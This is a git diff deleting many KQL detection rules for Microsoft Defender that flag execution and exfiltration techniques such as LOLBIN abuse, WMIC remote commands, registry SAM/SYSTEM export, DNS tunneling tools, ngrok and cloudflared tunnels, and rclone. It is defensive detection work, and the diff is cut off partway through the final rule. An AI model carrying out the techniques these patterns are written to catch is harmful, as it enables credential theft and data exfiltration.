deleted file mode 100644
index 275a6408..00000000
--- a/Execution/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2023/04/11
-// Level: medium
-// Description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries
-// Tags: attack.execution, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "Microsoft.NodejsTools.PressAnyKey.exe" and (not(FolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe"))
\ No newline at end of file
diff --git a/Execution/WMIC_Remote_Command_Execution.kql b/Execution/WMIC_Remote_Command_Execution.kql
deleted file mode 100644
index 11a8cfda..00000000
--- a/Execution/WMIC_Remote_Command_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/14
-// Level: medium
-// Description: Detects the execution of WMIC to query information on a remote system
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/node:" and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains "/node:127.0.0.1 " or ProcessCommandLine contains "/node:localhost ")))
\ No newline at end of file
diff --git a/Execution/WSL_Child_Process_Anomaly.kql b/Execution/WSL_Child_Process_Anomaly.kql
deleted file mode 100644
index 83b49b76..00000000
--- a/Execution/WSL_Child_Process_Anomaly.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/23
-// Level: medium
-// Description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where (InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wslhost.exe") and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "C:\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\"))
\ No newline at end of file
diff --git a/Execution/WScript_or_CScript_Dropper_-_File.kql b/Execution/WScript_or_CScript_Dropper_-_File.kql
deleted file mode 100644
index 4bd91b3d..00000000
--- a/Execution/WScript_or_CScript_Dropper_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Shelton
-// Date: 2022/01/10
-// Level: high
-// Description: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe
-// Tags: attack.execution, attack.t1059.005, attack.t1059.007
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") and (FolderPath endswith ".jse" or FolderPath endswith ".vbe" or FolderPath endswith ".js" or FolderPath endswith ".vba" or FolderPath endswith ".vbs") and (FolderPath startswith "C:\\Users\\" or FolderPath startswith "C:\\ProgramData")
\ No newline at end of file
diff --git a/Execution/Wab_Execution_From_Non_Default_Location.kql b/Execution/Wab_Execution_From_Non_Default_Location.kql
deleted file mode 100644
index 0ce9c87e..00000000
--- a/Execution/Wab_Execution_From_Non_Default_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/12
-// Level: high
-// Description: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity
-// Tags: attack.defense_evasion, attack.execution
-DeviceProcessEvents
-| where (FolderPath endswith "\\wab.exe" or FolderPath endswith "\\wabmig.exe") and (not((FolderPath startswith "C:\\Windows\\WinSxS\\" or FolderPath startswith "C:\\Program Files\\Windows Mail\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Mail\\")))
\ No newline at end of file
diff --git a/Execution/Weak_or_Abused_Passwords_In_CLI.kql b/Execution/Weak_or_Abused_Passwords_In_CLI.kql
deleted file mode 100644
index 495f7484..00000000
--- a/Execution/Weak_or_Abused_Passwords_In_CLI.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/14
-// Level: medium
-// Description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI.
-An example would be a threat actor creating a new user via the net command and providing the password inline
-
-// Tags: attack.defense_evasion, attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "123456789" or ProcessCommandLine contains "123123qwE" or ProcessCommandLine contains "Asd123.aaaa" or ProcessCommandLine contains "Decryptme" or ProcessCommandLine contains "P@ssw0rd!" or ProcessCommandLine contains "Pass8080" or ProcessCommandLine contains "password123" or ProcessCommandLine contains "test@202"
\ No newline at end of file
diff --git a/Execution/WinSxS_Executable_File_Creation_By_Non-System_Process.kql b/Execution/WinSxS_Executable_File_Creation_By_Non-System_Process.kql
deleted file mode 100644
index 22255567..00000000
--- a/Execution/WinSxS_Executable_File_Creation_By_Non-System_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/11
-// Level: medium
-// Description: Detects the creation of binaries in the WinSxS folder by non-system processes
-// Tags: attack.execution
-DeviceFileEvents
-| where (FolderPath endswith ".exe" and FolderPath startswith "C:\\Windows\\WinSxS\\") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\Systems32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Execution/Windows_Hotfix_Updates_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Windows_Hotfix_Updates_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index cc9098f3..00000000
--- a/Execution/Windows_Hotfix_Updates_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/20
-// Level: medium
-// Description: Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
-| where ProcessCommandLine contains " qfe" and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/Execution/WmiPrvSE_Spawned_A_Process.kql b/Execution/WmiPrvSE_Spawned_A_Process.kql
deleted file mode 100644
index 548475bc..00000000
--- a/Execution/WmiPrvSE_Spawned_A_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez @Cyb3rWard0g
-// Date: 2019/08/15
-// Level: medium
-// Description: Detects WmiPrvSE spawning a process
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\WmiPrvSe.exe" and (not(((LogonId in~ ("0x3e7", "null")) or isnull(LogonId) or (AccountName contains "AUTHORI" or AccountName contains "AUTORI") or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WmiPrvSE.exe")))
\ No newline at end of file
diff --git a/Execution/Wmiprvse_Wbemcomn_DLL_Hijack.kql b/Execution/Wmiprvse_Wbemcomn_DLL_Hijack.kql
deleted file mode 100644
index 631d57e9..00000000
--- a/Execution/Wmiprvse_Wbemcomn_DLL_Hijack.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/12
-// Level: high
-// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
-// Tags: attack.execution, attack.t1047, attack.lateral_movement, attack.t1021.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\wbem\\wbemcomn.dll" and InitiatingProcessFolderPath endswith "\\wmiprvse.exe"
\ No newline at end of file
diff --git a/Execution/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql b/Execution/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql
deleted file mode 100644
index 60ed5e82..00000000
--- a/Execution/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/12
-// Level: critical
-// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
-// Tags: attack.execution, attack.t1047, attack.lateral_movement, attack.t1021.002
-DeviceFileEvents
-| where InitiatingProcessFolderPath =~ "System" and FolderPath endswith "\\wbem\\wbemcomn.dll"
\ No newline at end of file
diff --git a/Execution/Wscript_Shell_Run_In_CommandLine.kql b/Execution/Wscript_Shell_Run_In_CommandLine.kql
deleted file mode 100644
index c0512515..00000000
--- a/Execution/Wscript_Shell_Run_In_CommandLine.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/31
-// Level: medium
-// Description: Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ProcessCommandLine contains "Wscript." and ProcessCommandLine contains ".Shell" and ProcessCommandLine contains ".Run"
\ No newline at end of file
diff --git a/Execution/Wusa.EXE_Executed_By_Parent_Process_Located_In_Suspicious_Location.kql b/Execution/Wusa.EXE_Executed_By_Parent_Process_Located_In_Suspicious_Location.kql
deleted file mode 100644
index e16627c1..00000000
--- a/Execution/Wusa.EXE_Executed_By_Parent_Process_Located_In_Suspicious_Location.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/11/26
-// Level: high
-// Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location.
-
-// Tags: attack.execution
-DeviceProcessEvents
-| where FolderPath endswith "\\wusa.exe" and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\Appdata\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Temporary Internet") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Pictures\\")))
\ No newline at end of file
diff --git a/Execution/Wusa.EXE_Extracting_Cab_Files_From_Suspicious_Paths.kql b/Execution/Wusa.EXE_Extracting_Cab_Files_From_Suspicious_Paths.kql
deleted file mode 100644
index c319c717..00000000
--- a/Execution/Wusa.EXE_Extracting_Cab_Files_From_Suspicious_Paths.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/05
-// Level: high
-// Description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument from suspicious paths
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Appdata\\Local\\Temp\\") and (ProcessCommandLine contains "/extract:" and FolderPath endswith "\\wusa.exe")
\ No newline at end of file
diff --git a/Execution/Wusa_Extracting_Cab_Files.kql b/Execution/Wusa_Extracting_Cab_Files.kql
deleted file mode 100644
index 13b35564..00000000
--- a/Execution/Wusa_Extracting_Cab_Files.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/04
-// Level: medium
-// Description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument which is not longer supported. This could indicate an attacker using an old technique
-// Tags: attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "/extract:" and FolderPath endswith "\\wusa.exe"
\ No newline at end of file
diff --git a/Execution/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql b/Execution/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql
deleted file mode 100644
index bd2befa9..00000000
--- a/Execution/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/01
-// Level: medium
-// Description: Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".xbap" and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe")) and (not((ProcessCommandLine contains " C:\\Windows\\" or ProcessCommandLine contains " C:\\Program Files")))
\ No newline at end of file
diff --git a/Exfiltration/Active_Directory_Structure_Export_Via_Csvde.EXE.kql b/Exfiltration/Active_Directory_Structure_Export_Via_Csvde.EXE.kql
deleted file mode 100644
index f4819e7d..00000000
--- a/Exfiltration/Active_Directory_Structure_Export_Via_Csvde.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/14
-// Level: medium
-// Description: Detects the execution of "csvde.exe" in order to export organizational Active Directory structure.
-// Tags: attack.exfiltration, attack.discovery, attack.t1087.002
-DeviceProcessEvents
-| where ((FolderPath endswith "\\csvde.exe" or ProcessVersionInfoOriginalFileName =~ "csvde.exe") and ProcessCommandLine contains " -f") and (not(ProcessCommandLine contains " -i"))
\ No newline at end of file
diff --git a/Exfiltration/Active_Directory_Structure_Export_Via_Ldifde.EXE.kql b/Exfiltration/Active_Directory_Structure_Export_Via_Ldifde.EXE.kql
deleted file mode 100644
index bb23104b..00000000
--- a/Exfiltration/Active_Directory_Structure_Export_Via_Ldifde.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/14
-// Level: medium
-// Description: Detects the execution of "ldifde.exe" in order to export organizational Active Directory structure.
-// Tags: attack.exfiltration
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-f" and (FolderPath endswith "\\ldifde.exe" or ProcessVersionInfoOriginalFileName =~ "ldifde.exe")) and (not(ProcessCommandLine contains " -i"))
\ No newline at end of file
diff --git a/Exfiltration/Arbitrary_File_Download_Via_ConfigSecurityPolicy.EXE.kql b/Exfiltration/Arbitrary_File_Download_Via_ConfigSecurityPolicy.EXE.kql
deleted file mode 100644
index 35c6c056..00000000
--- a/Exfiltration/Arbitrary_File_Download_Via_ConfigSecurityPolicy.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2021/11/26
-// Level: medium
-// Description: Detects the execution of "ConfigSecurityPolicy.EXE", a binary part of Windows Defender used to manage settings in Windows Defender.
-Users can configure different pilot collections for each of the co-management workloads.
-It can be abused by attackers in order to upload or download files.
-
-// Tags: attack.exfiltration, attack.t1567
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ConfigSecurityPolicy.exe" or FolderPath endswith "\\ConfigSecurityPolicy.exe" or ProcessVersionInfoOriginalFileName =~ "ConfigSecurityPolicy.exe") and (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://")
\ No newline at end of file
diff --git a/Exfiltration/Communication_To_Ngrok_Tunneling_Service_Initiated.kql b/Exfiltration/Communication_To_Ngrok_Tunneling_Service_Initiated.kql
deleted file mode 100644
index 7585af33..00000000
--- a/Exfiltration/Communication_To_Ngrok_Tunneling_Service_Initiated.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/11/03
-// Level: high
-// Description: Detects an executable initiating a network connection to "ngrok" tunneling domains.
-Attackers were seen using this "ngrok" in order to store their second stage payloads and malware.
-While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
-
-// Tags: attack.exfiltration, attack.command_and_control, attack.t1567, attack.t1568.002, attack.t1572, attack.t1090, attack.t1102, attack.s0508
-DeviceNetworkEvents
-| where RemoteUrl contains "tunnel.us.ngrok.com" or RemoteUrl contains "tunnel.eu.ngrok.com" or RemoteUrl contains "tunnel.ap.ngrok.com" or RemoteUrl contains "tunnel.au.ngrok.com" or RemoteUrl contains "tunnel.sa.ngrok.com" or RemoteUrl contains "tunnel.jp.ngrok.com" or RemoteUrl contains "tunnel.in.ngrok.com"
\ No newline at end of file
diff --git a/Exfiltration/Compressed_File_Creation_Via_Tar.EXE.kql b/Exfiltration/Compressed_File_Creation_Via_Tar.EXE.kql
deleted file mode 100644
index c32def88..00000000
--- a/Exfiltration/Compressed_File_Creation_Via_Tar.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), AdmU3
-// Date: 2023/12/19
-// Level: low
-// Description: Detects execution of "tar.exe" in order to create a compressed file.
-Adversaries may abuse various utilities to compress or encrypt data before exfiltration.
-
-// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-c" or ProcessCommandLine contains "-r" or ProcessCommandLine contains "-u") and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar")
\ No newline at end of file
diff --git a/Exfiltration/Compressed_File_Extraction_Via_Tar.EXE.kql b/Exfiltration/Compressed_File_Extraction_Via_Tar.EXE.kql
deleted file mode 100644
index f02eb771..00000000
--- a/Exfiltration/Compressed_File_Extraction_Via_Tar.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: AdmU3
-// Date: 2023/12/19
-// Level: low
-// Description: Detects execution of "tar.exe" in order to extract compressed file.
-Adversaries may abuse various utilities in order to decompress data to avoid detection.
-
-// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "-x" and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar")
\ No newline at end of file
diff --git a/Exfiltration/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql b/Exfiltration/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql
deleted file mode 100644
index 2846d8ff..00000000
--- a/Exfiltration/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali
-// Date: 2019/12/30
-// Level: medium
-// Description: Detects a copy command or a copy utility execution to or from an Admin share or remote
-// Tags: attack.lateral_movement, attack.collection, attack.exfiltration, attack.t1039, attack.t1048, attack.t1021.002
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "\\" and ProcessCommandLine contains "$") or ProcessCommandLine contains "\\Sysvol\\") and (((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or (ProcessCommandLine contains "copy" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains "move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") and ((FolderPath contains "\\powershell.exe" or FolderPath contains "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))))
\ No newline at end of file
diff --git a/Exfiltration/DNS_Exfiltration_and_Tunneling_Tools_Execution.kql b/Exfiltration/DNS_Exfiltration_and_Tunneling_Tools_Execution.kql
deleted file mode 100644
index 03a3a05c..00000000
--- a/Exfiltration/DNS_Exfiltration_and_Tunneling_Tools_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Daniil Yugoslavskiy, oscd.community
-// Date: 2019/10/24
-// Level: high
-// Description: Well-known DNS Exfiltration tools execution
-// Tags: attack.exfiltration, attack.t1048.001, attack.command_and_control, attack.t1071.004, attack.t1132.001
-DeviceProcessEvents
-| where FolderPath endswith "\\iodine.exe" or FolderPath contains "\\dnscat2"
\ No newline at end of file
diff --git a/Exfiltration/Email_Exifiltration_Via_Powershell.kql b/Exfiltration/Email_Exifiltration_Via_Powershell.kql
deleted file mode 100644
index 1dbebea8..00000000
--- a/Exfiltration/Email_Exifiltration_Via_Powershell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems),  Azure-Sentinel (idea)
-// Date: 2022/09/09
-// Level: high
-// Description: Detects email exfiltration via powershell cmdlets
-// Tags: attack.exfiltration
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Add-PSSnapin" and ProcessCommandLine contains "Get-Recipient" and ProcessCommandLine contains "-ExpandProperty" and ProcessCommandLine contains "EmailAddresses" and ProcessCommandLine contains "SmtpAddress" and ProcessCommandLine contains "-hidetableheaders") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/Exfiltration/Exports_Critical_Registry_Keys_To_a_File.kql b/Exfiltration/Exports_Critical_Registry_Keys_To_a_File.kql
deleted file mode 100644
index 4eea2e37..00000000
--- a/Exfiltration/Exports_Critical_Registry_Keys_To_a_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Oddvar Moe, Sander Wiebing, oscd.community
-// Date: 2020/10/12
-// Level: high
-// Description: Detects the export of a crital Registry key to a file.
-// Tags: attack.exfiltration, attack.t1012
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -E " or ProcessCommandLine contains " /E ") and (ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hkey_local_machine") and (ProcessCommandLine endswith "\\system" or ProcessCommandLine endswith "\\sam" or ProcessCommandLine endswith "\\security") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")
\ No newline at end of file
diff --git a/Exfiltration/Exports_Registry_Key_To_a_File.kql b/Exfiltration/Exports_Registry_Key_To_a_File.kql
deleted file mode 100644
index 77d9247a..00000000
--- a/Exfiltration/Exports_Registry_Key_To_a_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Oddvar Moe, Sander Wiebing, oscd.community
-// Date: 2020/10/07
-// Level: low
-// Description: Detects the export of the target Registry key to a file.
-// Tags: attack.exfiltration, attack.t1012
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -E " or ProcessCommandLine contains " /E ") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not(((ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hkey_local_machine") and (ProcessCommandLine endswith "\\system" or ProcessCommandLine endswith "\\sam" or ProcessCommandLine endswith "\\security"))))
\ No newline at end of file
diff --git a/Exfiltration/LOLBAS_Data_Exfiltration_by_DataSvcUtil.exe.kql b/Exfiltration/LOLBAS_Data_Exfiltration_by_DataSvcUtil.exe.kql
deleted file mode 100644
index ccb7d091..00000000
--- a/Exfiltration/LOLBAS_Data_Exfiltration_by_DataSvcUtil.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger
-// Date: 2021/09/30
-// Level: medium
-// Description: Detects when a user performs data exfiltration by using DataSvcUtil.exe
-// Tags: attack.exfiltration, attack.t1567
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/in:" or ProcessCommandLine contains "/out:" or ProcessCommandLine contains "/uri:") and (FolderPath endswith "\\DataSvcUtil.exe" or ProcessVersionInfoOriginalFileName =~ "DataSvcUtil.exe")
\ No newline at end of file
diff --git a/Exfiltration/Network_Communication_Initiated_To_Portmap.IO_Domain.kql b/Exfiltration/Network_Communication_Initiated_To_Portmap.IO_Domain.kql
deleted file mode 100644
index a9c40d3a..00000000
--- a/Exfiltration/Network_Communication_Initiated_To_Portmap.IO_Domain.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2024/05/31
-// Level: medium
-// Description: Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors
-// Tags: attack.t1041, attack.command_and_control, attack.t1090.002, attack.exfiltration
-DeviceNetworkEvents
-| where RemoteUrl endswith ".portmap.io"
\ No newline at end of file
diff --git a/Exfiltration/Network_Connection_Initiated_To_Cloudflared_Tunnels_Domains.kql b/Exfiltration/Network_Connection_Initiated_To_Cloudflared_Tunnels_Domains.kql
deleted file mode 100644
index 1f2dad0d..00000000
--- a/Exfiltration/Network_Connection_Initiated_To_Cloudflared_Tunnels_Domains.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Kamran Saifullah, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/05/27
-// Level: medium
-// Description: Detects network connections to Cloudflared tunnels domains initiated by a process on the system.
-Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
-
-// Tags: attack.exfiltration, attack.command_and_control, attack.t1567.001
-DeviceNetworkEvents
-| where RemoteUrl endswith ".v2.argotunnel.com" or RemoteUrl endswith "protocol-v2.argotunnel.com" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "update.argotunnel.com"
\ No newline at end of file
diff --git a/Exfiltration/Network_Connection_Initiated_To_DevTunnels_Domain.kql b/Exfiltration/Network_Connection_Initiated_To_DevTunnels_Domain.kql
deleted file mode 100644
index 8e3e38f9..00000000
--- a/Exfiltration/Network_Connection_Initiated_To_DevTunnels_Domain.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Kamran Saifullah
-// Date: 2023/11/20
-// Level: medium
-// Description: Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
-
-// Tags: attack.exfiltration, attack.t1567.001
-DeviceNetworkEvents
-| where RemoteUrl endswith ".devtunnels.ms"
\ No newline at end of file
diff --git a/Exfiltration/Network_Connection_Initiated_To_Mega.nz.kql b/Exfiltration/Network_Connection_Initiated_To_Mega.nz.kql
deleted file mode 100644
index 8b99a5d5..00000000
--- a/Exfiltration/Network_Connection_Initiated_To_Mega.nz.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/12/06
-// Level: low
-// Description: Detects a network connection initiated by a binary to "api.mega.co.nz".
-Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.
-
-// Tags: attack.exfiltration, attack.t1567.001
-DeviceNetworkEvents
-| where RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz"
\ No newline at end of file
diff --git a/Exfiltration/Network_Connection_Initiated_To_Visual_Studio_Code_Tunnels_Domain.kql b/Exfiltration/Network_Connection_Initiated_To_Visual_Studio_Code_Tunnels_Domain.kql
deleted file mode 100644
index a6d547c3..00000000
--- a/Exfiltration/Network_Connection_Initiated_To_Visual_Studio_Code_Tunnels_Domain.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Kamran Saifullah
-// Date: 2023/11/20
-// Level: medium
-// Description: Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
-
-// Tags: attack.exfiltration, attack.t1567.001
-DeviceNetworkEvents
-| where RemoteUrl endswith ".tunnels.api.visualstudio.com"
\ No newline at end of file
diff --git a/Exfiltration/PUA_-_Rclone_Execution.kql b/Exfiltration/PUA_-_Rclone_Execution.kql
deleted file mode 100644
index 187803ec..00000000
--- a/Exfiltration/PUA_-_Rclone_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group
-// Date: 2021/05/10
-// Level: high
-// Description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc
-// Tags: attack.exfiltration, attack.t1567.002
-DeviceProcessEvents
